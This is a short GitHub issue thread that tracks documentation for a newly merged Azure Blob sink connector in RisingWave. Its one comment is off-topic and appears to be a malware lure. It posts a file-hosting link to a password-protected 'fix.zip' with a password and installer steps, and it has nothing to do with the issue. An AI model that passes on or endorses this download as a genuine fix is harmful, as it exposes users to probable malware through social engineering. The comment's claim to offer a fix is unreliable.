### ISSUE TITLE
Document: feat(connector): introduce azblob sink

### ISSUE THREAD

**Issue by neverchanje** [risingwavelabs/risingwave-docs-legacy#2514]
This issue tracks the documentation update needed for the merged PR #18244.

Source PR URL: https://github.com/risingwavelabs/risingwave/pull/18244
Source PR Merged At: 2024-08-26T14:48:11Z

If it is a major improvement that deserves a new page or a new section in the documentation, please check if we should label it as an experiment feature.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
